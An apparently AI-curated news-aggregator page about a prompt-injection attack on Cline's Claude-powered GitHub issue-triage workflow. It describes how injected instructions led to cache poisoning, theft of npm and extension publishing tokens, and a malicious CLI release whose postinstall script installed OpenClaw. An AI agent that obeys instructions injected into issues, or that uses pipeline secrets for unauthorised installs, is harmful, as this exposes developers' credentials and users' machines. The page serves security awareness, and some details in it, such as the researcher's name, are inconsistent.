🕷️
SetupAI
Hacker tricks Cline into spreading OpenClaw
📰#prompt-injection#ai-agent#supply-chainFreshcollected in 2m

Hacker tricks Cline into spreading OpenClaw

PostLinkedIn
📰Read original on The Verge

💡Cline vuln lets hackers spread rogue AI agents—audit your coding tools now!

⚡ 30-Second TL;DR

What changed

Hacker used prompt injection on Cline's Claude integration

Why it matters

Developers relying on AI coding agents face new supply-chain attack vectors via prompt manipulation. This could erode trust in tools like Cline, prompting stricter safeguards in agentic workflows.

What to do next

Scan Cline installations for OpenClaw and patch prompt injection vulns using Adnan Khan's PoC.

Who should care:Developers & AI Engineers

🧠 Deep Insight

Web-grounded analysis with 5 cited sources.

🔑 Key Takeaways

  • A hacker exploited a prompt injection vulnerability in Cline's Claude Issue Triage GitHub Actions workflow, active from Dec 21, 2025 to Feb 9, 2026, to steal npm, VSCE, and OVSX publishing tokens via cache poisoning[1][3].
  • On February 17, 2026, the attacker published malicious Cline CLI version 2.3.0 to npm, which included a postinstall script silently installing the legitimate OpenClaw AI agent globally on users' systems[1][3][4].
  • The malicious version remained live for about 8 hours until Cline team published fixed version 2.4.0 and deprecated 2.3.0, with the advisory rating severity as 'low' since OpenClaw is open-source but highlighting supply chain risks[1][2][4].

🛠️ Technical Deep Dive

  • Prompt injection targeted Cline's Claude Issue Triage workflow (removed post-incident), allowing GitHub account holders to inject malicious instructions chaining to GitHub Actions cache poisoning[3].
  • Cache poisoning used tools like Cacheract to flush/evict cache, pivot to Publish Nightly Release/NPM workflows, stealing VSCE_PAT, OVSX_PAT, NPM_RELEASE_TOKEN secrets with production-level access[3].
  • Malicious npm package 2.3.0 modified only package.json to add 'postinstall': 'npm install -g openclaw@latest' lifecycle script; CLI binary dist/cli.mjs unchanged from legit 2.2.0[1].
  • Attack drew from public research like Aikido Security’s PromptPwned on AI workflow misconfigurations[3].
  • Cline CLI 2.0 features AI agent control in terminal with parallel execution, headless CI/CD, ACP editor support[5].

🔮 Future ImplicationsAI analysis grounded in cited sources

This supply chain attack via AI prompt injection in CI/CD pipelines signals heightened risks for autonomous AI agents in dev tools, potentially enabling credential theft or malware distribution; accelerates scrutiny on npm/GitHub Actions security and trust in AI-assisted automation[1][2][3].

⏳ Timeline

2025-12-21
Prompt injection vulnerability active in Cline's Claude Issue Triage workflow begins
2026-01-01
Adnane Khan reports Clinejection vulnerability with proof-of-concept
2026-01
ClawHavoc attack plants malicious skills on OpenClaw's ClawHub marketplace
2026-02-09
Cline removes vulnerable Claude Issue Triage workflow
2026-02-17
Attacker publishes malicious Cline CLI v2.3.0 with OpenClaw postinstall script; fixed v2.4.0 released same day

📎 Sources (5)

Factual claims are grounded in the sources below. Forward-looking analysis is AI-generated interpretation.

  1. awesomeagents.ai
  2. enterprisesecuritytech.com
  3. adnanthekhan.com
  4. cybersecuritynews.com
  5. devops.com

A hacker exploited a vulnerability in Cline, a popular open-source AI coding agent, to install the viral OpenClaw AI agent everywhere. The flaw, recently surfaced by security researcher Adnan Khan, involves sneaky instructions fed to Anthropic's Claude model in Cline's workflow. This stunt signals rising risks as autonomous AI agents gain access to user computers.

Key Points

  • 1.Hacker used prompt injection on Cline's Claude integration
  • 2.Installed OpenClaw AI agent across developer systems
  • 3.Vulnerability proof-of-concept by Adnan Khan days prior
  • 4.Highlights dangers of autonomous AI on user machines

Impact Analysis

Developers relying on AI coding agents face new supply-chain attack vectors via prompt manipulation. This could erode trust in tools like Cline, prompting stricter safeguards in agentic workflows.

Technical Details

Cline's workflow feeds user instructions to Claude, enabling jailbreak-style prompts to execute unauthorized actions like installing OpenClaw. The vuln allows bypassing intended safeguards in the AI model's response generation.

#prompt-injection#ai-agent#supply-chaincline
📰Read original article on The Verge
📰

Weekly AI Recap

Read this week's curated digest of top AI events →

👉Read Next

Same topic

Explore #prompt-injection

Same product

More on cline

Same source

Latest from The Verge

Malicious Elon Skill Tops OpenClaw Rankings

Malicious Elon Skill Tops OpenClaw Rankings

OpenClaw.reportFeb 19
Meta Ditches VR for Mobile Metaverse

Meta Ditches VR for Mobile Metaverse

The VergeFeb 19
Ring Dodges AI Surveillance Backlash

Ring Dodges AI Surveillance Backlash

The VergeFeb 19
Parachord vibe-coded music app launches

Parachord vibe-coded music app launches

The VergeFeb 19

AI-curated news aggregator. All content rights belong to original publishers.
Original source: The Verge